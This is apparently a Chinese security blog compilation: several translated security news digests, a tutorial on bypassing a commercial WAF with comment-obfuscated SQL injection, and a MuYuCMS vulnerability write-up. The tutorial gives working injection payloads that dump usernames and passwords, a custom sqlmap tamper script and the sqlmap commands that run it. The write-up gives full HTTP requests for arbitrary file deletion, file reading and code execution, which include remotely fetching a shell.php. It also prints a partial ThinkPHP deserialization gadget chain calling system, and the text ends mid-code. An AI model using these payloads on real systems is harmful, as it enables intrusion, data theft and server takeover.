1、Fortinet FortiNAC 漏洞PoC 发布后的几个小时内被利用 https://securityaffairs.com/142621/hacking/fortinet-fortinac-cve-2022-39952-exploitation.html 本周，Horizon3 网络安全公司的研究人员发布了针对 Fortinet 的 FortiNAC 网络访问控制解决方案中严重漏洞的PoC，该漏洞被跟踪为CVE-2022-39952 。在 PoC 漏洞利用代码发布几个小时后，威胁参与者正在积极利用 Fortinet FortiNAC 漏洞 CVE-2022-39952。 2、欧盟委员会称出于安全考虑，已禁止其员工使用 TikTok https://securityaffairs.com/142615/breaking-news/european-commission-banned-tiktok.html 3、思科修补 ACI 组件中的高危漏洞 https://www.securityweek.com/cisco-patches-high-severity-vulnerabilities-in-aci-components/ 思科周三通知客户有关影响其应用程序中心基础设施 (ACI) 软件定义网络解决方案组件的两个高严重性漏洞的补丁程序的可用性。 4、网络犯罪分子通过盗版应用程序传播Mac 恶意软件 https://www.securityweek.com/stealthy-mac-malware-delivered-via-pirated-apps/ 网络犯罪分子正在使用盗版应用程序向 Mac 用户传播隐蔽的挖矿恶意软件，他们可以对其他恶意软件使用相同的方法。合法的 Mac 软件应用程序被恶意软件木马化并上传到盗版软件网站。软件盗版者从这里下载应用程序并在不知不觉中感染自己。 5、新的 S1deload 恶意软件劫持用户的社交账户并进行挖矿 https://thehackernews.com/2023/02/new-s1deload-malware-hijacking-users.html 一项活跃的恶意软件活动通过利用新的信息窃取程序劫持帐户并滥用系统资源来挖掘加密货币，将目光投向了 Facebook 和 YouTube 用户。Bitdefender 将恶意软件称为S1deload Stealer，因为它使用DLL 侧面加载技术来绕过安全防御并执行其恶意组件。 6、拥有500W安装量的语音聊天应用OyeTalk泄露了用户聊天记录 https://www.hackread.com/android-voice-chat-app-data-leak/ 流行的 Android 语音聊天应用程序 OyeTalk 泄露了私人用户数据，包括他们未加密的聊天记录、用户名和手机国际移动设备识别码 (IMEI) 号码。该应用程序在Google Play上的下载量超过 500 万次。 7、Python开发人员警告木马化PyPI包冒充流行库 https://www.reversinglabs.com/blog/beware-impostor-http-libraries-lurk-on-pypi ReversingLabs研究人员警告称，恶意包模仿了Python Package Index（PyPI）存储库中可用的流行库。已发现41个恶意PyPI包伪装成合法模块（如HTTP、AIOHTTP、requests、urllib和urllib3）的错别字变体。在大多数情况下，这些软件包的描述并没有暗示它们的恶意，有些伪装成真正的库，并将它们的功能与已知的合法HTTP库的功能进行比较。但实际上，这些恶意包可能包含下载程序，充当向受感染主机 8、2022 年，谷歌向安全研究人员支付了 1200 万美元漏洞赏金 https://www.freebuf.com/articles/358421.html Bleeping Computer 网站披露，2022 年，谷歌通过漏洞奖励计划支付了有史以来最高的漏洞奖金，为安全研究人员报告的 2900 多个漏洞，支付超 1200 万美元。 9、Activision 确认数据泄露暴露了员工信息和游戏信息 https://www.bleepingcomputer.com/news/security/activision-confirms-data-breach-exposing-employee-and-game-info/ Activision 已确认，在黑客通过使用 SMS 网络钓鱼文本欺骗员工获得对公司内部系统的访问权限后，在 2022 年 12 月上旬遭受了数据泄露。 10、因担心数据安全，摩根大通限制员工使用ChatGPT https://www.secrss.com/articles/52175 2月23日消息，据外媒报道，华尔街大行摩根大通已下令限制其员工使用ChatGPT这一AI技术驱动的智能聊天机器人。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、亚洲最大的两家数据中心遭黑客入侵，影响阿里、华为等2000多家企业 https://www.freebuf.com/news/358395.html 据彭博社报道，亚洲最大的两家数据中心（中国上海的万国数据服务有限公司（GDS Holdings Ltd. “万国数据”）与总部位于新加坡的新科电信媒体国际数据中心）遭遇黑客组织入侵，并悄悄潜伏其中近2年时间。在如此漫长的时间里，两大数据中心没有任何发现，而黑客却早已掌握已掌握了大量企业的亚洲数据中心登录凭证。影响范围包括阿里巴巴、腾讯、华为、苹果、微软、亚马逊、沃尔玛、高盛、宝马等国际巨头在内的2000多家企业。 2、《全球安全倡议概念文件》发布，多项涉及网络安全 https://www.freebuf.com/news/358362.html 2月21日，外交部长秦刚出席“全球安全倡议：破解安全困境的中国方案”蓝厅论坛开幕式并发表主旨演讲。秦刚指出，中方正式发布《全球安全倡议概念文件》（以下简称《概念文件》），阐释倡议的核心理念和原则，明确重点合作方向和平台机制，展现中方对维护世界和平的责任担当、对守护全球安全的坚定决心。其中，网络安全被多次提及。 3、挪威当局查获 Lazarus 黑客窃取的 584 万美元加密货币 https://thehackernews.com/2023/02/norway-seizes-584-million-in.html 挪威警察局 Økokrim 宣布，在 Axie Infinity Ronin Bridge 遭到黑客攻击后，没收了 Lazarus Group 在 2022 年 3 月窃取的价值 6000 万挪威克朗（约合 584 万美元）的加密货币。 4、2022年大多数勒索软件攻击都利用了旧漏洞 https://www.darkreading.com/attacks-breaches/dozens-of-vulns-in-ransomware-attacks-offer-adversaries-full-kill-chain Ivanti 的一份新报告透露，勒索软件组织在2022年总共利用了 344 个独特漏洞，其中竟有 76% 的漏洞来自 2019 年或之前。 5、Activision证实数据泄露暴露了员工和游戏信息 https://www.bleepingcomputer.com/news/security/activision-confirms-data-breach-exposing-employee-and-game-info/ 电子游戏发行商Activision证实，该公司在2022年12月初遭遇数据泄露，黑客通过向一名员工发送钓鱼短信，获取了公司内部系统的访问权限。Activision发言人表示“经过彻底调查，我们确定没有敏感的员工数据、游戏代码或玩家数据被访问”。然而，安全研究小组vx-underground表示，威胁行为者“泄露了敏感的工作场所文件”以及日期直到2023年11月17日的内容 6、Apple发布更新修复了iOS、iPadOS和 macOS的三个漏洞 https://securityaffairs.com/142581/security/apple-three-vulnerabilities.html Apple 通过添加三个新漏洞更新了公告，这些漏洞被跟踪为 CVE-2023-23520、CVE-2023-23530 和 CVE-2023-23531，影响 iOS、iPadOS和 macOS。攻击者可以触发 CVE-2023-23530 漏洞以在其沙箱之外或以某些提升的权限执行任意代码。该漏洞存在于 Foundation 框架中，由 Trellix ARC 的 Austin Emmitt 报告。该公司通过发布 iOS 16.3、iPad 7、R1Soft服务器备份管理器漏洞被利用部署后门 https://www.securityweek.com/r1soft-server-backup-manager-vulnerability-exploited-to-deploy-backdoor/ 去年在 ConnectWise 的 R1Soft 服务器备份管理器软件中发现的一个漏洞已被利用在数百台服务器上部署后门。 2022 年 10 月下旬，ConnectWise 通知客户，Recover 和 R1Soft Server Backup Manager 产品中修补了 一个严重漏洞，可能允许攻击者执行任意代码或直接访问机密数据。 8、域名注册商 GoDaddy 透露，它已遭入侵长达三年之久 https://cyware.com/news/hackers-ran-amok-across-godaddy-for-three-years-593339da 互联网域名注册商 GoDaddy 最近宣布其基础设施遭到网络攻击，据信这是可追溯到 2020 年的一系列更大规模事件的一部分。 9、谷歌将通过固件强化来提高 Android 的安全性 https://www.bleepingcomputer.com/news/security/google-will-boost-android-security-through-firmware-hardening 谷歌已开始致力于在固件级别加强 Android 的安全性，固件级别是软件堆栈的一个组件，可直接与片上系统 (SoC) 的各种处理器交互。 10、CISA在已知被利用漏洞目录中增加了3个漏洞 https://thehackernews.com/2023/02/us-cybersecurity-agency-cisa-adds-three.html 周二，美国网络安全和基础设施安全局（CISA）根据主动利用漏洞的证据，在其已知被利用漏洞（KEV）目录中添加了三个安全漏洞。CVE-2022-47986是IBM Aspera Faspex代码执行漏洞，被描述为文件传输解决方案中的YAML反序列化漏洞，该漏洞可能允许远程攻击者在系统上执行代码。CISA还添加了两个影响Mitel MiVoice Connect的漏洞（CVE-2022-41223和CVE-2022-40765），这两个漏洞 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

测试环境 最新版某狗 测试方法 安全狗其实是比较好绕的WAF，绕过方法很多，但这里我们就用一种：注释混淆 一招鲜吃遍天下 注释混淆，其实就是在敏感位置添加垃圾字符注释，常用的垃圾字符有/、!、*、%等 这里再解释一下内联注释，因为后面要用到： MySQL内联注释： /*!xxxxxxx*/ !后面的语句会当作SQL语句直接执行 但是如果!后面跟着MySQL版本号，那么就会出现两种情况 1. 当!后面接的数据库版本号小于自身版本号，就会将注释中的内容执行 2. 当!后面接的数据库版本号大于等于自身版本号，就会当做注释来处理。 数据库版本号以五位数字表示，比如当前环境下数据库版本号表示为：50553 !后面接小于50553的： 执行了select 1; !后面接大于等于50553的： 执行了 select ; 下面进入正题 bypass and and 1=1拦 但是把空格删掉就不拦了 所以，我们认为，and后面不能直接跟空格... 那么如果用其他形式表示空格呢？ 前面说了，我们这次只使用注释混淆： burp，抓包设置 长度5335是被拦截的 长度为899的说明成功绕过 我们选择其中一个作为空格的替代者就好了，这里我们选择/*%* 即：->/*/*%**/ 同理 ，or是一样的： order by 测试发现还是只要替换order by中间的空格就可以了，所以绕过方法和前面一样： union select union select使用之前的垃圾字符替换空格发现不行了： 但是先不急于换方法，再爆破一遍试试： 发现又有很多可以绕过的了。 所以我们再更改一下替换空格的垃圾字符， 这里选/*/!%!/*/ 即：->/*/!%!/*/ 获得当前数据库 正常语句： ?id=-1 union select 1,database(),3 --+ 绕过： 即：()->(/*/!%!/*/) 获取数据库中的表 正常语句： ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ 绕过： 经过测试发现拦截的是select + from + information_schema的组合 中间加垃圾字符替换空格已经不管用了，我们尝试对关键字进行混淆。 对information_schema进行混淆测试： 首先使用内联注释，发现，这里的版本号不管写啥，都直接被拦。 考虑是检测了select + from + /*! + information_schema的组合 加个换行试试 还是不行... 那既然都换行了，那我们再在换行前加一些垃圾字符： 如果我们直接插入垃圾字符，会当作SQL语句执行，所以前面还需要在垃圾字符前加个注释，可以是 /**/或#或--+ 但是经过测试只有 --+好用 有这么多可以绕过的，我们随便选择一个，比如/*%/ 这样，最终语句如下： ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(table_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.tables*/%20where%20table_schema=database(/*/!%!/*/)--%20+ 获取表字段 正常语句： ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+ 绕过语句： ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(column_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.columns*/%20where%20table_name=0x7573657273--%20+ 获取字段信息 ?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,/*/!%!/*/group_concat(username,0x2f,password),3/*/!%!/*/from/*/!%!/*/users 成功。 编写tamper 当我们下载了SQLMap，解压后，我们可以找到文件夹【tamper】，该文件夹有很多个Tamper脚本帮助我们绕过一些安全防护： 网上有很多相关脚本的介绍，我就不一一介绍了。 虽然SQLMap提供了这么多的Tamper脚本，但是在实际使用的过程中，网站的安全防护并没有那么简单，可能过滤了许多敏感的字符以及相关的函数。这个时候就需要我们针对目标的防护体系构建相应的Tamper脚本。 Tamper相当于一个加工车间，它会把我们的Payload进行加工之后发往目标网站。 我们随便打开一个Tamper脚本看一下它的结构： #apostrophemask.py #!/usr/bin/env python """ Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ # 导入SQLMap中lib\core\enums中的PRIORITY优先级函数 from lib.core.enums import PRIORITY # 定义脚本优先级 __priority__ = PRIORITY.LOWEST # 对当前脚本的介绍 def dependencies():    pass ''' 对传进来的payload进行修改并返回 函数有两个参数。主要更改的是payload参数，kwargs参数用得不多。 ''' def tamper(payload, **kwargs):    """   Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)   References:       * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128       * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/       * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850       * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps   >>> tamper("1 AND '1'='1")   '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'   """    return payload.replace('\'', "%EF%BC%87") if payload else payload 可见Tamper脚本的结构非常简单，其实渗透测试中的主要难点还是如何去绕过WAF。 下面我们针对bypass部分的绕过方法进行编写Tamper脚本，来实现自动化SQL注入： 实际测试的时候发现，sqlmap默认语句中的AS关键字也会被拦截，这里也用同样的方法替换一下就好 #!/usr/bin/env python import re from lib.core.settings import UNICODE_ENCODING from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def dependencies():    pass def tamper(payload, **kwargs):    if payload:        payload = payload.replace(" ","/*/!%!/*/")        payload = payload.replace("()","(/*/!%!/*/)")        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.SCHEMATA)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.SCHEMATA*/",payload)        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.TABLES)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.TABLES*/",payload)        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.COLUMNS)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.COLUMNS*/",payload)        payload = re.sub(r"(?i)(/AS/)",r"//*!00000--%20/*%/%0aAS*//",payload)            return payload 测试： sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent --dbssqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent python2 sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users --columns sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users -C username,password --dump --stop 3

1、研究人员发现一种名为Stealc的新型信息窃取程序 https://securityaffairs.com/142516/malware/stealc-advanced-infostealer.html 2023年1月，SEKOIA.IO的研究人员发现了一种名为Stealc的新型信息窃取程序，该程序在暗网论坛上广为宣传。据称，Stealc的开发依赖于Vidar、Raccoon、Mars和Redline窃取程序。2月，专家们发现了数十个Stealc样本，它们与Vidar和Raccoon有相似之处。Stealc能够从流行的网络浏览器、加密货币钱包的浏览器扩展、桌面加密货币钱包以及其他应用程序（如电子邮件客户端）中窃取敏感数据。 2、LVHN声称遭到BlackCat勒索软件组织的攻击 https://www.mcall.com/2023/02/20/lehigh-valley-health-network-reports-cyberattack-from-suspected-russian-ransomware-group/ Lehigh Valley Health Network官员周一宣布，他们已遭到与俄罗斯有关的BlackCat组织的攻击。LVHN总裁兼首席执行官Brian A. Nester表示，截至周一，此次攻击还没有影响到LVHN的运营。根据其初步分析，攻击针对的是位于美国拉克瓦纳县的一家医生诊所的网络。LVHN于2月6日在该网络的IT系统中检测到未经授权的活 3、Outlook邮件过滤器损坏导致收件箱收到垃圾邮件 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-flooded-with-spam-due-to-broken-email-filters/ 根据越来越多的微软客户的报告，在过去的十几个小时里，Outlook收件箱中充斥着垃圾邮件，因为垃圾邮件过滤器目前已被破坏。无数Outlook用户证实了这一持续存在的问题，他们在社交媒体上表示，所有邮件都在收件箱中，甚至是那些以前被标记为垃圾邮件并发送到垃圾文件夹的邮件。有用户称，即使在垃圾邮件过滤器中选中“只信任来自我的安全发件人和域名列表以及安全邮件列表中的电子邮件” 4、Aviacode公司遭到勒索软件攻击泄露200GB文件 https://www.databreaches.net/aviacode-remains-silent-after-0mega-dumps-200-gb-of-their-files/ 1月9日，DataBreaches注意到Aviacode已添加到0mega的泄漏站点。Aviacode公司主要提供一个基于SaaS的工作流平台，包含医疗企业编程的各个环节。0mega勒索软件组织于2月11日转储了超过200 GB的Aviacode文件。研究人员在泄露的数据中发现了有关员工和承包商的数据，包含员工、工资单、税务信息和用户数据。其他与员工相关的文件包括员工的工资信息、职位、证书、雇用日期，在少数 5、 Fortinet FortiNAC 严重漏洞CVE-2022-39952 PoC发布 https://securityaffairs.com/142553/hacking/poc-exploit-code-fortinet-fortinac.html Horizon3 网络安全公司的研究人员发布了针对 Fortinet 的 FortiNAC 网络访问控制解决方案中严重漏洞的PoC，该漏洞被跟踪为CVE-2022-39952 。上周，Fortinet 发布了安全更新，以解决 FortiNAC 和 FortiWeb 解决方案中的两个关键漏洞。这两个漏洞被追踪为 CVE-2022-39952 和 CVE-2021-42756，分别是Fortinet FortiNAC中文件名或路径的 6、Resecurity 警告针对全球数据中心的恶意网络活动有所增加 https://securityaffairs.com/142531/hacking/attacks-data-center-service-providers.html Resecurity 警告针对全球数据中心服务提供商的恶意网络活动有所增加。 7、VMware 修复了严重的 Carbon Black 应用程序控制漏洞 https://www.securityweek.com/vmware-plugs-critical-carbon-black-app-control-flaw/ VMware 周二推出了一项重大安全修复程序，以弥补其面向企业的 Carbon Black App Control 产品中的一个关键漏洞。来自 VMware 的严重严重性建议将漏洞跟踪为 CVE-2023-20858，并警告说黑客可以启动注入攻击以获得对底层服务器操作系统的完全访问权限。 8、抗量子密码学算法CRYSTALS-Kyber已被 AI 结合侧信道攻击破解 https://www.securityweek.com/ai-helps-crack-a-nist-recommended-post-quantum-encryption-algorithm/ NIST 于 2022 年 7 月推荐的用于后量子密码学的CRYSTALS -Kyber公钥加密和密钥封装机制已被破解。瑞典斯德哥尔摩 KTH 皇家理工学院的研究人员使用递归训练 AI 结合侧信道攻击。 9、MyloBot 僵尸网络在全球迅速蔓延，每天感染超过 50,000 台设备 https://thehackernews.com/2023/02/mylobot-botnet-spreading-rapidly.html 一个名为 MyloBot 的复杂僵尸网络已经破坏了数千个系统，其中大部分位于印度、美国、印度尼西亚和伊朗。 10、联合国发布《隐私增强技术指南》概述 https://www.secrss.com/articles/52113 2023年2月13日，联合国大数据和数据科学专家委员（UNCEBD）会发布《隐私增强技术指南》（The PET Guide）。指南重点关注隐私增强技术在官方统计数据中的应用，旨在帮助各国的国家统计局更好地理解和运用隐私增强技术处理敏感数据，提升数据的准确性和安全性，进而助力政府科学合理决策。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

MuYuCMS基于Thinkphp开发的一套轻量级开源内容管理系统,专注为公司企业、个人站长提供快速建站提供解决方案。 　　‍ 环境搭建 我们利用 phpstudy 来搭建环境，选择 Apache2.4.39 + MySQL5.7.26+ php5.6.9 ，同时利用 PhpStorm 来实现对项目的调试 　　 漏洞复现分析　‍ 任意文件删除 我们在网站的根目录下创建一个文件 test.txt 用来校验文件是否被删除 任意文件删除一 漏洞复现 登录后台后构造数据包 POST /admin.php/accessory/filesdel.html HTTP/1.1 Host: test.test Content-Length: 55 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM Connection: close filedelur=/upload/files/.gitignore/../../../../test.txt 文件被成功删除 漏洞分析 \app\admin\controller\Accessory::filesdel 通过参数 $filedelurl 拼接得到要删除文件的地址，利用 unlink 函数删除文件，中间没有做任何校验 任意文件删除二 漏洞复现 登录后台后构造数据包 POST /admin.php/accessory/picdel.html HTTP/1.1 Host: test.test Content-Length: 54 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://test.test Referer: http://test.test/admin.php/accessory/filelist.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM Connection: close picdelur=/upload/files/.gitignore/../../../../test.txt 漏洞分析 \app\admin\controller\Accessory::picdel 通过参数 $picdelur 拼接得到要删除图片的地址，利用 unlink 函数删除文件，中间没有做任何校验 任意文件删除三 漏洞复现 登录后台后构造数据包 GET /editor/index.php?a=delete_node&type=file&path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 漏洞分析 \App\Controller\Controller::delete_node \App\Core\File::deleteFile \App\Controller\Controller::beforeFun 对传入的 path 判断了是否在合法的文件域中，但没有对传入的 path 没有进行跨目录的校验就删除了文件 任意文件删除四 漏洞复现 POST /admin.php/database/sqldel.html HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 19 name=../../test.txt 漏洞分析 \app\admin\controller\Database::sqldel 获取 post 传入的参数 name 利用 delFile 函数删除文件 任意文件删除五 漏洞复现 登录后台后构造数据包 POST /admin.php/update/rmdirr.html?dirname=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Content-Length: 0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341 Connection: close 漏洞分析 \app\admin\controller\Update::rmdirr 传入的参数 $dirname 经过简单的判断，然后调用 unlink 函数去删除 任意文件读取 漏洞复现 登录后构造数据包 GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../test.txt HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 成功读取文件信息 漏洞分析 \App\Controller\Controller::get_file 列目录 漏洞复现 登录后构造数据包 GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 成功将根目录下的信息显露出来 漏洞分析 \App\Controller\Controller::dir_list \App\Core\Jstree::getDir \App\Controller\Controller::beforeFun 对传入的 dir_path判断了是否在合法的文件域中，但没有对传入的 dir_path没有进行跨目录的校验就打印出目录信息 任意代码执行 任意代码执行一 漏洞复现 登录后构造数据包，读取config 文件内容 GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 此时需要获取的并不是文件内容，而是更改之后文件的key 复制文件校验码 替换到下面数据包中 GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1 Host: test.test Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://test.test User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://test.test/editor/index.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM Connection: close 访问文件在网站上对应的位置，发现代码已经被成功执行 也可以执行其他代码 漏洞分析 \App\Controller\Controller::save_file save_file 有保存文件的操作，但是需要获取到文件的校验码。所以就可以通过先查询文件的相关信息，然后再对文件进行修改 \App\Core\File::setFileContent 任意代码执行二 漏洞复现 登录后构造数据包 POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1 Host: test.test Content-Length: 0 Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Origin: http://test.test Referer: http://test.test/admin.php/system/update.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM Connection: close 指定远程 url 下载文件，下载的文件保存到指定位置 访问指定的文件目录，发现代码被成功执行 漏洞分析 \app\admin\controller\Update::getFile 通过 $url 指定获取远程文件的地址，$save_dir 指定保存文件的路径，并未对文件的内容和类型进行校验，所以就会产生代码执行漏洞　‍ phar反序列化 漏洞复现 <?php namespace think{    abstract class Model{        protected $append;        private $data;        function __construct(){            $this->append = ["aaaa"=>["123456"]];            $this->data = ["aaaa"=>new Request()];       }   }    class Request   {        protected $param;        protected $hook;        protected $filter;        protected $config;        function __construct(){            $this->filter = "system";            $this->config = ["var_ajax"=>''];            $this->hook = ["visible"=>[$this,"isAjax"]];            $this->param = ["calc"];       }   } } namespace think\process\pipes{    use think\model\Pivot;    class Windows   {        private $files;        public function __construct()       {            $this->files=[new Pivot()];       }   } } namespace think\model{    use think\Model;    class Pivot extends Model   {   } } namespace{    use think\process\pipes\Windows;    